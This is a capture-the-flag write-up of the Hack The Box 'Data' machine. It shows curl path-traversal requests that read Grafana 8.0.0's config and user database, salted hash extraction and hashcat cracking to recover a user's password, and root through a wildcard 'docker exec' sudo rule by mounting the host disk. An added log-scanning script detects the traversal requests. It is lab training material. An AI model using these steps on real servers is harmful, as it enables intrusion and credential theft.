Data - Vulnlab(HTB)

Data – Easy Machine (Hack The Box, VL):

A very easy machine from VulnLab on Hack The Box. In this box, we exploit a known LFI vulnerability in Grafana, then escalate privileges through a sudo rule that permits docker exec.


Recon

Initial Nmap scan shows port 3000 open:

3000/tcp open  http

Visiting http://<ip>:3000 reveals Grafana v8.0.0.

This version has a known LFI vulnerability. Reference: GitHub Security Advisory

LFI path:

<grafana_host_url>/public/plugins/alertlist/

Exploiting the LFI

We can exploit it with a simple curl request; --path-as-is stops curl from collapsing the ../ segments before sending:

curl --path-as-is http://10.129.248.135:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini

From the grafana.ini file, we find the path to the DB: /var/lib/grafana/grafana.db

Download it:

curl --path-as-is http://10.129.248.135:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
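
On the defensive side, requests like the two above stand out in access logs because the file part of a /public/plugins/<plugin-id>/ request climbs above the plugin directory. The following detector is an added example, not part of the original write-up; the reverse proxy in front of Grafana, its combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: a reverse proxy in front of Grafana writes combined-format access logs.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
PLUGIN_ROUTE = re.compile(r"^/public/plugins/([^/]+)/(.*)$", re.S)

def escapes_plugin_dir(raw_path):
    """True if a /public/plugins/<id>/<file> request climbs above the plugin directory."""
    # Drop the query string and decode once so dot segments are compared in one form.
    path = unquote(raw_path.split("?", 1)[0]).replace("\\", "/")
    match = PLUGIN_ROUTE.match(path)
    if not match:
        return False
    if match.group(1) in (".", ".."):
        return True
    depth = 0  # directory depth relative to the plugin root
    for segment in match.group(2).split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

def scan(log_text):
    """Return (client, status, path) for every request that leaves the plugin directory."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m and escapes_plugin_dir(m.group(2)):
            hits.append((m.group(1), int(m.group(3)), m.group(2)))
    return hits

# Constructed sample log (documentation addresses, not taken from the original post).
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /public/plugins/alertlist/img/icn-alertlist-panel.svg HTTP/1.1" 200 1024
192.0.2.10 - - [01/Jan/2025:10:00:01 +0000] "GET /public/plugins/alertlist/css/../img/icn-alertlist-panel.svg HTTP/1.1" 200 1024
198.51.100.7 - - [01/Jan/2025:10:02:11 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini HTTP/1.1" 200 3456
198.51.100.7 - - [01/Jan/2025:10:02:15 +0000] "GET /public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1" 200 598016
192.0.2.10 - - [01/Jan/2025:10:03:00 +0000] "GET /api/health HTTP/1.1" 200 70
'''

if __name__ == "__main__":
    for client, status, path in scan(SAMPLE_LOG):
        print(f"ALERT {client} status={status} {path}")
```

A flagged request that returned status 200 means the file was served, so the credentials and secrets in that file should be treated as exposed.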

Open the database:

sqlite3 grafana.db

sqlite> select * from user;

Example output:

1|0|admin|admin@localhost||7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S|hLLY6QQ4Y6||1|1|0||2022-01-23 12:48:04|2022-01-23 12:48:50|0|2022-01-23 12:48:50|0
2|0|boris|[email protected]|boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl|mYl941ma8w||1|0|0||2022-01-23 12:49:11|2022-01-23 12:49:11|0|2012-01-23 12:49:11|0
sqlite> .exit

hash -> dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8
salt -> LCBhdtJWjl

echo -n "dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl" > g.hsh

Cracking the Hash

Grafana stores the password hash as a hex string with the salt in a separate column, which hashcat cannot read directly. To convert the pair to hashcat format, use this script:

wget https://raw.githubusercontent.com/iamaldi/grafana2hashcat/refs/heads/main/grafana2hashcat.py

Prepare the hash file (g.hsh), then run:

python3 grafana2hashcat.py g.hsh -o hash
hashcat -m 10900 -a 0 hash wordlist.txt

Result:

boris : beautiful1

Privilege Escalation

Log in as boris and check sudo permissions:

sudo -l

Output:

User boris may run the following commands on localhost:
    (root) NOPASSWD: /snap/bin/docker exec *

Find running containers:

ps aux | grep containerd

Example:

root      1598  0.0  0.4 713120  8620 ?        Sl   20:55   0:00 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339

Spawn a root shell in the container. The wildcard in the sudo rule lets us pass --privileged and --user root to docker exec:

sudo /snap/bin/docker exec -it --privileged --user root e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339 bash

Look for mounted host filesystem:

~$ mount
<SNIP>
/dev/sda1 on / type ext4 (rw,relatime)
<SNIP>

Mount the device and read the root flag:

bash-5.1# mount /dev/sda1 /mnt
bash-5.1# cd /mnt
bash-5.1# cat root/root.txt
2616c*****b3ebc************

Thanks for reading this quick writeup.

This post is licensed under CC BY 4.0 by the author.